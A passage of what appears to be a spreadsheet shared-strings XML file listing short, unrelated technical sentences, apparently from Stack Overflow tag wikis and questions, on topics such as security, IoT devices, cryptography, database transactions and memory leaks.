    <t>The deprecated Google+ People API lets you list the authenticated user's circled people and retrieve profile information for the authenticated user.</t>
  </si>
  <si>
    <t>A related format known as "source debs" usually consists of multiple files: a .dsc file listing each of the other files in the source with cryptographic hashes, a tarball of some sort (.tar.gz, .tar.bz2, etc.</t>
  </si>
  <si>
    <t>Does anyone have any ideas on how I would connect to this drive, I'm game for anything at this stage to get it to work...
What I've tried:
Share has permissions for everyone and can be accessed without credentials
Network share computer firewall is off.</t>
  </si>
  <si>
    <t>I wanted to know if developing a hardware and iPad app that connects to lightning serial cable which itself is MFi Certified needs to be registered under MFi Licensing program?</t>
  </si>
  <si>
    <t>The Cloud IOT online documentation page "Device Security" describes a device provisioning process where a "Provisioner" creates a key pair, and distributes the private key to the Device.</t>
  </si>
  <si>
    <t>I get an error when I try to register a Generic Access service:
As Generic Access and Device Information are mandatory, the resulting advertisement dosn't comply to the standard.</t>
  </si>
  <si>
    <t>I've been sitting on this idea of working on a "networked intelligence" to look into some interesting ideas on the nature of intelligence and computers.</t>
  </si>
  <si>
    <t>Unless you're using a secure processor that can actually decrypt things into memory that can't be read by the operating system, your program is never truly encrypted.</t>
  </si>
  <si>
    <t>The Opaque gateway requires you to create a module that runs on the IoT Edge and wraps all the commands/reports to/from the edge device to indicate which edge device they are associated with, because as far as the hub is concerned they are all one device.</t>
  </si>
  <si>
    <t>Hole punching is the process of taking advantage of the standard way of implementing NAT to allow direct connection between computers in private networks.</t>
  </si>
  <si>
    <t>A software bug is an error, flaw, mistake, failure, or fault in a computer program or system that produces an incorrect or unexpected result, or causes it to behave in unintended ways.</t>
  </si>
  <si>
    <t>In the Windows context, driver signing refers to Microsoft's requirements that device driver binaries be signed with a certificate whose provenance Microsoft trusts, e.g.</t>
  </si>
  <si>
    <t>A blacklist is a list of entities that are banned from some access or action (entities not in the blacklist are authorized, including unknown entities).</t>
  </si>
  <si>
    <t>Bitcoinj is a Java implementation of the Bitcoin protocol, which allows it to maintain a wallet and send/receive transactions without needing a local copy of Bitcoin Core.</t>
  </si>
  <si>
    <t>It has no concept of virtual memory, paging or memory protection as in protected-mode and long-mode.</t>
  </si>
  <si>
    <t>Account Kit lets people quickly register for and login to your app by using just their phone number or email address  no password needed.</t>
  </si>
  <si>
    <t>@Embeddable is an annotation used in Java to suggest that a class is stored as an intrinsic part of an owning entity and share the identity of the entity.</t>
  </si>
  <si>
    <t>Isolated storage is a data storage mechanism for Windows applications that provides isolation and safety by defining standardized ways of associating code with saved data</t>
  </si>
  <si>
    <t>Primary key is a single field or the least combination of fields that uniquely identifies each record in table.</t>
  </si>
  <si>
    <t>While it can be used to communicate with standard HID devices like keyboards, mice, and Joysticks, it is most useful when used with custom (Vendor-Defined) HID devices.</t>
  </si>
  <si>
    <t>Legal questions about software licenses are off-topic on Stack Overflow, but may be on-topic on its Programmers sister site.</t>
  </si>
  <si>
    <t>An umbrella term for methods and algorithms to synchronize multithreaded environments or other forms of distributed system without using locks.</t>
  </si>
  <si>
    <t>Examples of text components are text fields and text areas, of which password fields and document editors are special instantiations.</t>
  </si>
  <si>
    <t>Control information provides data for delivering the payload, for example: source and destination network addresses, error detection codes, and sequencing information.</t>
  </si>
  <si>
    <t>Latest Version of the Standard
Identifying Characters
PDF charts
Character list
For more general information, see the Unicode article on Wikipedia.</t>
  </si>
  <si>
    <t>The purpose of this forum is to help the community to understand, build, develop, and expedite delivery of applications integrating with Microsoft's information protection solutions.</t>
  </si>
  <si>
    <t>It keeps track of the computers connected to the network with a central database and prevents two computers from accidentally being configured with the same IP address.</t>
  </si>
  <si>
    <t>CICS manages the entire transaction such that if for any reason a part of the transaction fails all recoverable changes can be backed out.</t>
  </si>
  <si>
    <t>The Logging APIs capture information such as security failures, configuration errors, performance bottlenecks, and/or bugs in the application or platform.</t>
  </si>
  <si>
    <t>WEBrick also includes tools to run a process as a service and starting a process at a higher privilege level and dropping permissions.</t>
  </si>
  <si>
    <t>Site owners actively refuse to let unknown bots to use their sites, by all technical and legal means.</t>
  </si>
  <si>
    <t>Servers are also vulnerable to race conditions, sometimes more so, because there are many independent clients which act independently, as well as delays caused by network communication.</t>
  </si>
  <si>
    <t>Advanced Installer is a setup authoring tool which creates installers and software packages.</t>
  </si>
  <si>
    <t>Login script shows: board name with large text, distribution base,
kernel version, system load, up time, memory usage, IP address,
CPU temp, drive temp, ambient temp from Temper if exits, SD card
usage, battery conditions and number of updates to install.</t>
  </si>
  <si>
    <t>Some common use cases:
Design and document specific data structures
Convert structures to and from different formats such as JSON or MsgPack
Validate API inputs
Remove fields based on access rights of some datas recipient
Define message formats for communications protocols, like an RPC
Custom persistence layers
Read more about the project here</t>
  </si>
  <si>
    <t>I'm developing a project for my home and I would like to make a system that allows me to identify people that enters the different rooms of the house using a RFID tag bracelet and emissors strategically placed around the house.</t>
  </si>
  <si>
    <t>Obfuscating code refers to the practice of making intentionally making code difficult to read or understand for security purposes, or as a programming challenge.</t>
  </si>
  <si>
    <t>This is separate from other areas of automation, due to several special concerns:
credentials must be stored and transmitted in a secure manner
code with credentials cannot be stored with the rest of the source code
too little automation is not useful
too much automation can lead to accidental sock puppeting
Questions/answers posted to this tag should keep these special concern of user credentials in mind.</t>
  </si>
  <si>
    <t>It is being developed as a part of the OpenDNSSEC project.</t>
  </si>
  <si>
    <t>AIM allows merchants to customize their own payment form (the Web page that collects the customer's payment information) and receipt page (the Web page that reports a summary of the transaction back to the customer), as well as submit transactions over an end-to-end Secure Sockets Layer (SSL)</t>
  </si>
  <si>
    <t>The Enterprise Security API (ESAPI) is a library developed by the Open Web Application Security Project (OWASP).</t>
  </si>
  <si>
    <t>Part of the Open Web Application Security Project.</t>
  </si>
  <si>
    <t>A global transaction identifier (GTID) is a unique identifier created and associated with each transaction committed on the server of origin (master).</t>
  </si>
  <si>
    <t>This question resulted in a verifiable bug, reported to the maintainers or the application\product.</t>
  </si>
  <si>
    <t>Apology for the repetition, let me describe my pain:
All efforts to give permission to python script for php based web access goes in vain.</t>
  </si>
  <si>
    <t>Does anyone have any good pointers to an ethereum private blockchain on a raspberry pi for running smart contracts?</t>
  </si>
  <si>
    <t>Gretl is a cross-platform software package for econometric analysis, written in the C programming language.</t>
  </si>
  <si>
    <t>Certificate enrollment policy provides the locations of certification authorities (CAs) and the types of certificates that can be requested.</t>
  </si>
  <si>
    <t>Infection is a PHP mutation testing framework based on AST (Abstract Syntax Tree) mutations.</t>
  </si>
  <si>
    <t>Snoop is the open source WPF spying utility created by Pete Blois and now maintained by Team Snoop (Cory Plotts, Dan Hanan, Andrei Kashcha, and Maciek Rakowski).</t>
  </si>
  <si>
    <t>Do not use this tag merely to indicate that you don't understand how a program works: use it only when the program was made obfuscated on purpose.</t>
  </si>
  <si>
    <t>Pound is a lightweight open source reverse proxy program and application firewall.</t>
  </si>
  <si>
    <t>A hotspot is a physical location where people may obtain Internet access, typically using Wi-Fi technology.</t>
  </si>
  <si>
    <t>FLIHs which service hardware typically mask their associated interrupt (or keep it masked as the case may be) until they complete their execution.</t>
  </si>
  <si>
    <t>The lookup process on the server can be either file-based (where the session ID is used as part of the file name), or from a database (where the session ID is used as the primary key).</t>
  </si>
  <si>
    <t>Rather then sending 0x0136 or 31010 you need to send a byte sequence to form a valid keyboard report as described by your device's  keyboard report descriptor.</t>
  </si>
  <si>
    <t>PEVerify is a tool that checks if .NET assemblies meet type safety requirements.</t>
  </si>
  <si>
    <t>Other security features such as address space layout randomization, structured exception handler overwrite protection, and Mandatory Integrity Control, can be used in conjunction with DEP.</t>
  </si>
  <si>
    <t>The Google Assistant SDK includes a gRPC API, a Python open source client that handles authentication and access to the API, samples and documentation.</t>
  </si>
  <si>
    <t>This standard was historically part of the PKCS (Public-Key Cryptography Standards) family published by RSA Security.</t>
  </si>
  <si>
    <t>Then when you create the individual devices in the Cloud, you don't specify an SSL key (the Console will warn you about the device not being able to connect) and then you can "associate" the device with the gateway, and it'll handle the auth piece for you.</t>
  </si>
  <si>
    <t>Less code and fewer dependencies means a smaller attack surface, lower memory usage, and fewer places for bugs to hide.</t>
  </si>
  <si>
    <t>While for simple usage patterns this doesn't matter much, for advanced usage it is important to familiarize yourself with these APIs and the guarantees they provide.</t>
  </si>
  <si>
    <t>In contrast, a thin client generally does as little processing as possible and relies on accessing the server each time input data needs to be processed or validated.</t>
  </si>
  <si>
    <t>This procedure is very well documented in Authorizing from a Companion App  check "Procedure for Obtaining Refresh and Access Tokens" section.</t>
  </si>
  <si>
    <t>Public-key Cryptography Standard #10 (also known as RFC2986) specifies format of messages sent to a certification authority to request certification of a public key.</t>
  </si>
  <si>
    <t>Therefore any seed material passed to a SecureRandom object must be unpredictable, and all SecureRandom output sequences must be cryptographically strong, as described in RFC 1750: Randomness Recommendations for Security.</t>
  </si>
  <si>
    <t>opc-ua is an interoperability standard that enables the secure and reliable exchange of industrial automation data while remaining cross-platform and vendor neutral.</t>
  </si>
  <si>
    <t>Nethereum is a .Net integration library for Ethereum, simplifying the access and smart contract interaction with Ethereum nodes both public or permissioned like Geth, Parity or Quorum.</t>
  </si>
  <si>
    <t>The data transport is augmented by a control protocol (RTCP) to allow monitoring of the data delivery in a manner scalable to large multicast networks, and to provide minimal control and identification functionality.</t>
  </si>
  <si>
    <t>Mod tools are very helpful for solving whole categories of problems (reputation confusion, merging accounts, suspicious voting patterns, etc.</t>
  </si>
  <si>
    <t>From the online documentation (https://cloud.google.com/iot/docs/concepts/device-security) under the Device Security Recommendations section it states:
'Use TLS 1.2 when communicating with mqtt.googleapis.com:8883 (or :443), and verify that the server certificate is valid using root certificate authorities.</t>
  </si>
  <si>
    <t>See this post in dev forums: https://devforums.apple.com/message/119423#119423
I "detect" the same leak in the leaks tool in my implementation of an AVAudioPlayer and am pretty sure my code is correct (mainly because it is so simple).</t>
  </si>
  <si>
    <t>Windows App Certification Kit: Before you submit your app for certification and listing in the Windows Store, use the Windows App Certification Kit to test your app and make sure it's ready to go.</t>
  </si>
  <si>
    <t>An identicon is a small, abstract image that serves as a visual hash of identifying information such as an email or IP address.</t>
  </si>
  <si>
    <t>JPF gets back to you with a report that says if the properties hold and/or which verification artifacts have been created by JPF for further analysis (like test cases).</t>
  </si>
  <si>
    <t>Uglifier or minifier are normally used with scripting languages like JavaScript, where the source code must be provided, but the goal is:
to minimize the needed bandwidth for transmission
To obfuscate the source code so it is less likely to be reverse engineered</t>
  </si>
  <si>
    <t>This, together with DBMS independent record and metadata management leads to an unprecedented level of ease-of-use and compile-time-safety.</t>
  </si>
  <si>
    <t>I also looked at the usual s, disable sd card, free memory, dchp memory leak, router ip lease time and a bunch of others.</t>
  </si>
  <si>
    <t>If the SSH process is terminated, the OS will send a Hangup signal to all the children of the SSH process, and this will cause those process to exit immediately.</t>
  </si>
  <si>
    <t>Now, the impossible part is actually making sure that data hasn't been tampered with before it enters your software  who says that, for example, the driver for your temperature sensor hasn't been replaced by something that always says "-18 C"?</t>
  </si>
  <si>
    <t>Until very recently, if you wanted to create your own Z-Wave device, you had to spend about $3,000 and sign a non-disclosure agreement to get access to the documentation and tools, and your device had to be certified before you could sell it.</t>
  </si>
  <si>
    <t>Since threading bugs are order-dependencies, Jinx exposes bugs that don't arise frequently in normal operation.</t>
  </si>
  <si>
    <t>Personal firewall and antivirus software As a result of our research, we've found that at least 3 personal security applications block WebSocket traffic.</t>
  </si>
  <si>
    <t>The game has the player develop mock assembly language code to perform certain tasks on a virtualized massively-parallel computer from the 1980's that has been corrupted.</t>
  </si>
  <si>
    <t>You can process 
transactions including sales, pre-authorizations, captures, voids, refunds, recurring payments, 
card-tokens and more.</t>
  </si>
  <si>
    <t>Hackers and crackers try to reverse engineer your application code to see how the licensing is done, so you make look into other security concerns and it is advised to use an obfuscation tool to make this harder for malicious users.</t>
  </si>
  <si>
    <t>Medical device mapping and identification-Data transfer
I would like identify the device and mapping the device to my web application using php and read the device input and convert the input into binary data file format and convert binary data into view able data.</t>
  </si>
  <si>
    <t>Network as in standard Ethernet, Cat5, RJ-45, etc.</t>
  </si>
  <si>
    <t>DB is accessed in a C program using transactions.</t>
  </si>
  <si>
    <t>But I cannot run the program as superuser since I don't have those permissions on the Pi.</t>
  </si>
  <si>
    <t>I think it has to do with the memory leaks.</t>
  </si>
  <si>
    <t>So your program runs and you have overload protection.</t>
  </si>
  <si>
    <t>However, if someone is to compromise you, they'd need to first compromise your Pi and then use that.</t>
  </si>
  <si>
    <t>This is a bug (or undocumented deficiency) in NodeMCU.</t>
  </si>
  <si>
    <t>See the source for verification of this.</t>
  </si>
  <si>
    <t>Request Tracker (RT) is a bug tracking system.</t>
  </si>
  <si>
    <t>Microsoft Application Verifier is a runtime verification tool for unmanaged code.</t>
  </si>
  <si>
    <t>EJBCA is an enterprise class PKI Certificate Authority software.</t>
  </si>
  <si>
    <t>Wi-Fi peer-to-peer (WiFiP2p) is an Android framework that complies with the Wi-Fi Alliance's Wi-Fi Direct certification program.</t>
  </si>
  <si>
    <t>Autodesk Vault is a data management software developed by Autodesk</t>
  </si>
  <si>
    <t>DO-178B is a guideline for the safety of safety-critical software</t>
  </si>
  <si>
    <t>An error is an exception, bug, or flaw in a system or program.</t>
  </si>
  <si>
    <t>An RTOS is most likely to be used in in verifiable or safety critical systems.</t>
  </si>
  <si>
    <t>The law is named after Intel co-founder Gordon E. Moore, who described the trend in his 1965 paper.</t>
  </si>
  <si>
    <t>Memory leaks.</t>
  </si>
  <si>
    <t>Government agencies also use XMetaL for tracking legislation.</t>
  </si>
  <si>
    <t>This process may be referred to as Security through Obscurity.</t>
  </si>
  <si>
    <t>All of these standards are set and maintained by the PCI Security Standards Council.</t>
  </si>
  <si>
    <t>redsn0w - The most popular unlock tool for iOS
evasi0n - iOS 6.0-6.1.2 Untethered JB.</t>
  </si>
  <si>
    <t>Before attempting to extract any information from a website in a method that is potentially contrary to the sites' indented usage, it is important to exercise due diligence in educating yourself in applicable local and international laws as well as the site's terms of service, copyrights, and trademarks.</t>
  </si>
  <si>
    <t>This specification is being developed within the IETF OAuth WG and is based on the OAuth WRAP proposal.</t>
  </si>
  <si>
    <t>Intermec is a manufacturer and supplier of automated identification and data capture equipment.</t>
  </si>
  <si>
    <t>More information: The Open Web Application Security Project.</t>
  </si>
  <si>
    <t>I'm playing with Raspberry Pi's and have 6 currently that I want to use throughout a few of my personal properties for surveillance purposes.</t>
  </si>
  <si>
    <t>This mode helps a developer to identify potential bugs in an app.</t>
  </si>
  <si>
    <t>EzAuth is an open source robust PHP/MySQL user database, authorization, access control list and user session management system</t>
  </si>
  <si>
    <t>Keep servers alive with FusionReactor's unattended monitoring to maintain server availability and safeguard against server crashes.</t>
  </si>
  <si>
    <t>For example, a file on the file system is uniquely identified based on the array of parent directories and the name of the file.</t>
  </si>
  <si>
    <t>R FAQ - Official list of R FAQs on CRAN
R bug tracking system - report bugs in base-R here.</t>
  </si>
  <si>
    <t>An open source trusted execution environment.</t>
  </si>
  <si>
    <t>While you can setup AWS IoT policy based on the client id, that should not be used to uniquely identify a device.</t>
  </si>
  <si>
    <t>CAPTCHA is an acronym for "Completely Automated Public Turing test to tell Computers and Humans Apart".</t>
  </si>
  <si>
    <t>**Black magic**, which refers to (code based on) techniques that appear to work but which lack a theoretical explanation.</t>
  </si>
  <si>
    <t>Plaid is a RESTful API that is built for US-based banking authentication, verification, and data retrieval.</t>
  </si>
  <si>
    <t>Black magic, which refers to (code based on) techniques that appear to work but which lack a theoretical explanation.</t>
  </si>
  <si>
    <t>It is roughly what Common Lisp hackers use to build software where C hackers would use say GNU Make.</t>
  </si>
  <si>
    <t>An industry-led organization which aims to certify and improve interoperability of natural interaction devices</t>
  </si>
  <si>
    <t>Face recognition is part of a larger class of biometric technologies.</t>
  </si>
  <si>
    <t>Available under the MPL licence, SubLimeCodeIntel Code intelligence plugin ported from Open Komodo Editor to Sublime Text 2.</t>
  </si>
  <si>
    <t>A GKMinmaxStrategist object is a form of artificial intelligence for use in turn-based, adversarial games in objective-c.</t>
  </si>
  <si>
    <t>Authentication is loosely defined as determining whether an entity actually is what it purports to be (i.e., identification), based on some set of credentials.</t>
  </si>
  <si>
    <t>While some methods can be reused, Apple generally tries to close any open loopholes that allow this to happen.</t>
  </si>
  <si>
    <t>ModSecurity is an open source intrusion detection and prevention engine for web applications.</t>
  </si>
  <si>
    <t>But I don't really want anything that might compromise the security of that computer, so sticking with the end-user's regular WiFi seems likely the best option.)</t>
  </si>
  <si>
    <t>I've found in the past that when I approach ~95% usage of the available ram on the arduino you begin to see corruption without any warnings.</t>
  </si>
  <si>
    <t>If you're using C, there's an Open Source XBee Host Library with support for wired firmware updates and a sample program to do the updates.</t>
  </si>
  <si>
    <t>Additionally, $LOGNAME (case-sensitive) is the currently logged in user and not the Apache process which is probably something like 'www-data' depending on your linux distribution.</t>
  </si>
  <si>
    <t>Use the find-sec-bugs tag for questions specifically about the Find Security Bugs plugin for SpotBugs.</t>
  </si>
  <si>
    <t>Cloudtrax is a cloud-based network controller for Open Mesh networks that provides:
Centralized, browser-based management for your wireless networks.</t>
  </si>
  <si>
    <t>User verification by sending email with token or OTP(Open Time Password) for SMS verification.</t>
  </si>
  <si>
    <t>Cuckoo Sandbox is free software that automated the task of analyzing any malicious file under Windows, OS X, Linux, and Android.</t>
  </si>
  <si>
    <t>I'm already moderating Software Recommendations (one of the more active beta sites on the network), so I already know where all the moderation buttons are and what they do.</t>
  </si>
  <si>
    <t>Wiegand readers for 13.56 MHz (more specifically ISO/IEC 14443 Type A) typically read the anti-collision identifier of cards/tags.</t>
  </si>
  <si>
    <t>You should be able to handle all of them by either querying or modifying your database:
SYNC -  A request for what devices this user has, some of their configuration information, and what commands they respect.</t>
  </si>
  <si>
    <t>Advanced Installer is a setup authoring tool which is primarily used to creates Windows Installer MSI packages.</t>
  </si>
  <si>
    <t>Each transaction sees a snapshot of database when it started and its changes are only seen when transaction is committed.This method provides more concurrency them locks.</t>
  </si>
  <si>
    <t>It is integrated with Hackage, a central package archive of open-source software written in Haskell.</t>
  </si>
  <si>
    <t>Validation is the process of ensuring that a process or application operates on clean, correct and useful data or resources.</t>
  </si>
  <si>
    <t>The safe version of Sensor costs code space and execution time on every system deployed and every second the program is running.</t>
  </si>
  <si>
    <t>But there is no standard GATT Service that does this, and the manufacturer-specific schemes are designed specifically to set beacon identifiers and other operating parameters.</t>
  </si>
  <si>
    <t>Testing can include verification of domain related behavior and/or compliance with HTTP specified application behavior as described in RFC 7231.</t>
  </si>
  <si>
    <t>Security
CakePHP comes with built-in tools for input validation, csrf protection, Form tampering protection, sql-injection prevention, and xss prevention, helping you keep your application safe &amp; secure.</t>
  </si>
  <si>
    <t>Isolation - The isolation property ensures that the concurrent execution of transactions results in a system state that would be obtained if transactions were executed serially, i.e., one after the other.</t>
  </si>
  <si>
    <t>Envers provides simple entity auditing and change tracking by using Java annotations to influence what it to be tracked by the change management listeners.</t>
  </si>
  <si>
    <t>For Virtuoso, these include a Users mailing list, Open Source Edition bug reports and other issues, confidential Support cases, etc.</t>
  </si>
  <si>
    <t>You absolutely always need to have a MAC address since that's what uniquely identifies your ethernet card on a local network; you must never have two cards with the same MAC address on a given local network.</t>
  </si>
  <si>
    <t>Click continue through the main windows, and agree to terms of software license agreement to install
Enter your admin password.</t>
  </si>
  <si>
    <t>SSID is a case sensitive, 32 alphanumeric character unique identifier attached to the header of packets sent over a wireless local-area network (WLAN).</t>
  </si>
  <si>
    <t>SMJobBless demonstrates how to securely install a helper tool that performs a privileged operation and how to associate the tool with an application that invokes it.</t>
  </si>
  <si>
    <t>The gadgets have been discontinued due to lack of security - anyone could develop a gadget, and could insert malicious code inside the gadget, which could lead to compromising the machine and exposing all of the user's sensitive data to third parties.</t>
  </si>
  <si>
    <t>The term  covers a range of techniques used to alter or augment the behavior or intercepting keyboard event messages before they reach an application.</t>
  </si>
  <si>
    <t>Raw types allow implicit unchecked conversions which compromise type safety:
Their usage is officially discouraged in modern Java code.</t>
  </si>
  <si>
    <t>A combination of central locks on remote procedure calls and explicit locks on file server or time server processes may be necessary to ensure data integrity in a distributed system.</t>
  </si>
  <si>
    <t>For an attacker, it provides a means of manipulating the memory and sending messages to objects / calling methods on objects, without the host process's knowledge.</t>
  </si>
  <si>
    <t>More information can be found in the Rust Book
In Go, package unsafe contains operations that step around the type safety of Go programs.</t>
  </si>
  <si>
    <t>While containers have revolutionized how we develop, package, and deploy applications, running untrusted or potentially malicious code without additional isolation is not a good idea.</t>
  </si>
  <si>
    <t>As with a regular map, it allows fast random access by key; and as with a regular list, it maintains the keys in a consistent order, which can be manipulated and queried using standard list operations.</t>
  </si>
  <si>
    <t>avrdude stk500_getsync() timeout communicating with programmer
After some Googling we tried the following fixes:
Remove all the  in the source code, Because of this the Mega
  can enter some kind of safe mode
Tried a test sketch, Same error
When uploading a sketch presing the reset button on the board.</t>
  </si>
  <si>
    <t>These four APIs, the Image API, Presentation API, Search API, and Auth API provide a standard way to access image presentation content, and are supported by a large number of community-developed image servers and viewing software.</t>
  </si>
  <si>
    <t>CurveZMQ , noun;
An authentication and encryption protocol for ZeroMQ
Based on CurveCP and NaCl - fast, secure elliptic-curve crypto
Open-source codec for end-to-end security
Implemented in libzmq master for point-to-point security
Considered experimental and aimed at developers
Designed and supported by iMatix</t>
  </si>
  <si>
    <t>If I try to run any python program that uses OpenGL over SSH on X-ming, it imediately crashes.</t>
  </si>
  <si>
    <t>This would allow you to run ethereum transactions also on an arduino.</t>
  </si>
  <si>
    <t>With a view to becoming  open source as an OpenCL standard being licenced under MIT.</t>
  </si>
  <si>
    <t>The usb cable will not be connected to the computer, it will be connect to a device with "Zero" intelligence.</t>
  </si>
  <si>
    <t>So as you can see there are several flaws somewhere in the system whether its hardware or software I don't know.</t>
  </si>
  <si>
    <t>I need to store sensitive data on Raspberry so that software running on Raspberry can use it, but nobody else cannot.</t>
  </si>
  <si>
    <t>I am developing a software which needs a fingerprint ID to get access or login.</t>
  </si>
  <si>
    <t>I'm currently developing a Software for Raspian which should be decentralized.</t>
  </si>
  <si>
    <t>The code below is part of my "safe" program.</t>
  </si>
  <si>
    <t>I need to get my bluetooth device certified by the regulatory authorities.</t>
  </si>
  <si>
    <t>Where should I look, or how can I prevent a memory leak?</t>
  </si>
  <si>
    <t>Therefore I made sure that the processes got rw access to the device and even tried running them as superuser.</t>
  </si>
  <si>
    <t>The code is encrypted (No one can see the source code of the program).</t>
  </si>
  <si>
    <t>I have sensitive keys and authentication credentials on memory.</t>
  </si>
  <si>
    <t>The just serves as verification tool so as to determain that the problem is not with my app.</t>
  </si>
  <si>
    <t>I think this source programs are using JWT authentication.</t>
  </si>
  <si>
    <t>Unfortunately, using their software requires special permission and training.</t>
  </si>
  <si>
    <t>It is possible this is a red herring from the Leaks tool.</t>
  </si>
  <si>
    <t>That information should be static (even in the tokenzation case) and, hence, could be used to identify the device.</t>
  </si>
  <si>
    <t>Perhaps you should design your UI in a different manner, so that such hacks won't be necessary.</t>
  </si>
  <si>
    <t>Combine that with Blockchain  a distributed ledger architecture (DLT) pattern.</t>
  </si>
  <si>
    <t>That way, you're sure that the electronic design is OK and you have the guarantee.</t>
  </si>
  <si>
    <t xml:space="preserve">
The code is encrypted (No one can see the source code of the program).</t>
  </si>
  <si>
    <t>i cannot help you with the ssh functionality you seek as i have never tried that nor do i have the tools available to me right now to try.</t>
  </si>
  <si>
    <t>The DevEUI is an ID in the IEEE EUI64 address space used to identify a device.</t>
  </si>
  <si>
    <t>No need to worry about memory leaks any more.</t>
  </si>
  <si>
    <t>You may check your anti-virus SW.</t>
  </si>
  <si>
    <t>Disruptor is a pattern used to perform around 6-8 million transactions per second.</t>
  </si>
  <si>
    <t>It uses industry standard protocols like OAuth2.0, OpenId Connect, and SAML2.0.</t>
  </si>
  <si>
    <t>Commonly known as Functional Verification.</t>
  </si>
  <si>
    <t>The server access log records all requests processed by the server.</t>
  </si>
  <si>
    <t>Why3 is a platform for deductive program verification.</t>
  </si>
  <si>
    <t>Microsoft Entourage is an e-mail client and personal information manager.</t>
  </si>
  <si>
    <t>S60v3 uses a hardened version of Symbian OS (v9.1), which has mandatory code signing.</t>
  </si>
  <si>
    <t>Account management with the open-source Meteor platform.</t>
  </si>
  <si>
    <t>Radar is Apple's internal enhancement &amp; bug tracking system.</t>
  </si>
  <si>
    <t>Guzzle 3 is only maintained for bug and security fixes.</t>
  </si>
  <si>
    <t>It offers bug tracking system too.</t>
  </si>
  <si>
    <t>Hunch is a website, designed as a collective intelligence decision-making system.</t>
  </si>
  <si>
    <t>A certificate is an electronic document used in cryptography.</t>
  </si>
  <si>
    <t>Authorization is a key theme in computer security practices.</t>
  </si>
  <si>
    <t>It is the act of looking on the processes or systems for performance, supervision and surveillance.</t>
  </si>
  <si>
    <t>personal information manager</t>
  </si>
  <si>
    <t>PHPMD - the PHP Mess Detector -- is a code quality analysis tool for PHP, similar to PMD for Java.</t>
  </si>
  <si>
    <t>TestStand is a test management software by National Intruments.</t>
  </si>
  <si>
    <t>It eliminates security risks, honors for AJAX, DRY, KISS, MVC and code reuse.</t>
  </si>
  <si>
    <t>ionCube is a tool to obfuscate PHP code so clients can run software without having the source code.</t>
  </si>
  <si>
    <t>The Software Engineering Institute has produced a lexicon of terms used in malware analysis.</t>
  </si>
  <si>
    <t>NDB is well-suited to storing structured data records.</t>
  </si>
  <si>
    <t>There may also be legal or contractual requirements for acceptance of the system.</t>
  </si>
  <si>
    <t>Password protection is a technique used in information security to limit access to information.</t>
  </si>
  <si>
    <t>These memory areas are called segments in Intel terminology.</t>
  </si>
  <si>
    <t>To specify an authority, you must also specify one or more schemes that it is associated with.</t>
  </si>
  <si>
    <t>Deobfuscation is the reverse process of obfuscation.</t>
  </si>
  <si>
    <t>Authentication is any process by which a system verifies the identity of a User who wishes to access it.</t>
  </si>
  <si>
    <t>FHIR is an interoperability standard intended to facilitate the exchange of healthcare information between organizations.</t>
  </si>
  <si>
    <t>MSBI stands for Microsoft Business Intelligence.</t>
  </si>
  <si>
    <t>CoreOS is designed for security, consistency, and reliability.</t>
  </si>
  <si>
    <t>This allows the user to specify configuration information when the program is launched.</t>
  </si>
  <si>
    <t>OpenGL SC is tuned for the safety critical market.</t>
  </si>
  <si>
    <t>Some units also provide memory protection from faulty devices.</t>
  </si>
  <si>
    <t>QA-C is a code quality assurance tool developed in 1986 for C language.</t>
  </si>
  <si>
    <t xml:space="preserve"> is the packet capture and analysis tool for Named Data Networking (NDN) that provides a tcpdump-like functionality for NDN network.</t>
  </si>
  <si>
    <t>Gherkin-Cucumber syntax add-on for mocha javascript/node test framework for customer acceptance testing.</t>
  </si>
  <si>
    <t>Concurrency and fault-tolerance using Celluloid actors.</t>
  </si>
  <si>
    <t>This requirement is often applied to software that is security-sensitive (e.g.</t>
  </si>
  <si>
    <t>ethereum was proposed in late 2013 by Vitalik Buterin, a cryptocurrency researcher and programmer.</t>
  </si>
  <si>
    <t>An Audit trail to analyze access patterns.</t>
  </si>
  <si>
    <t>The source code of the library is distributed under very permissive MIT license.</t>
  </si>
  <si>
    <t>Questions about professional server administration should typically be posted on Server Fault.</t>
  </si>
  <si>
    <t>Hardware and electronic cold-wallet support.</t>
  </si>
  <si>
    <t>The Data Loss Prevention API helps you redact and classify sensitive data.</t>
  </si>
  <si>
    <t>Each document is identified by a unique ID.</t>
  </si>
  <si>
    <t>The HDLs will allow fast design and better verification.</t>
  </si>
  <si>
    <t>Delete sensitive information.</t>
  </si>
  <si>
    <t>There are many tools available for Business Intelligence.</t>
  </si>
  <si>
    <t>An undocumented feature is a bug.</t>
  </si>
  <si>
    <t>Analyzing a binary for security issue.</t>
  </si>
  <si>
    <t>The more robust the code is, the less combinations that cause a bug in the code.</t>
  </si>
  <si>
    <t>It is also the name of the program for manipulating these addresses in most operating systems.</t>
  </si>
  <si>
    <t>Then in the todo tag I access the records using opts and t that is the parameter.</t>
  </si>
  <si>
    <t>It is most commonly known for its AntiVirus and Internet Security software.</t>
  </si>
  <si>
    <t>They are typically used for automated testing of websites.</t>
  </si>
  <si>
    <t>And combined with ASLR for security randomization, 32-bit memory gets fragmented very quickly.</t>
  </si>
  <si>
    <t>KDCs often operate in systems within which some users may have permission to use certain services at some times and not at others and is a fundamental part of the Kerberos authentication protocol.</t>
  </si>
  <si>
    <t>The Java Pairing Based Cryptography Library (jPBC) is:
a Java Port of the Pairing-Based Cryptography Library (PBC) library developed by Ben Lynn.</t>
  </si>
  <si>
    <t>To begin with, I'm doing a mini project on the verification of RFID card using NodeMCU.</t>
  </si>
  <si>
    <t>After all, encryption is most often used to communicate between two locations, and the language used at the target location might not even be known.</t>
  </si>
  <si>
    <t>This library is being developed as part of a facial recognition project.</t>
  </si>
  <si>
    <t>IPFS aims to make the web faster, safer, and more open by  connecting all computing devices with the same system of files.</t>
  </si>
  <si>
    <t>uid refers to a string used for record keeping which is not guaranteed to be unique, but should be in the large majority of use cases.</t>
  </si>
  <si>
    <t>It is based on the Bitcoin protocol but differs from Bitcoin in that it can be efficiently mined with consumer-grade hardware.</t>
  </si>
  <si>
    <t>The software never performs conditional branches based on secret data; the pattern of jumps is completely predictable.</t>
  </si>
  <si>
    <t>Based on the specification described in its dsl, the state of a system (mostly a server or container) can be verified, very similar to serverspec.</t>
  </si>
  <si>
    <t>OpenACS is also a open source project (hosted on SourceForge) where ACS stands for "Automatic Configuration Server" also known as CWMP: CPE WAN Management Protocol or TR-069.</t>
  </si>
  <si>
    <t>The RFC is the stable and recommended specification to implement, it is based on the obsolete OAuth Core 1.0 Revision A specification.</t>
  </si>
  <si>
    <t>Protection of information and property from theft, corruption, or natural disaster, while allowing the information and property to remain accessible and productive to its intended users.</t>
  </si>
  <si>
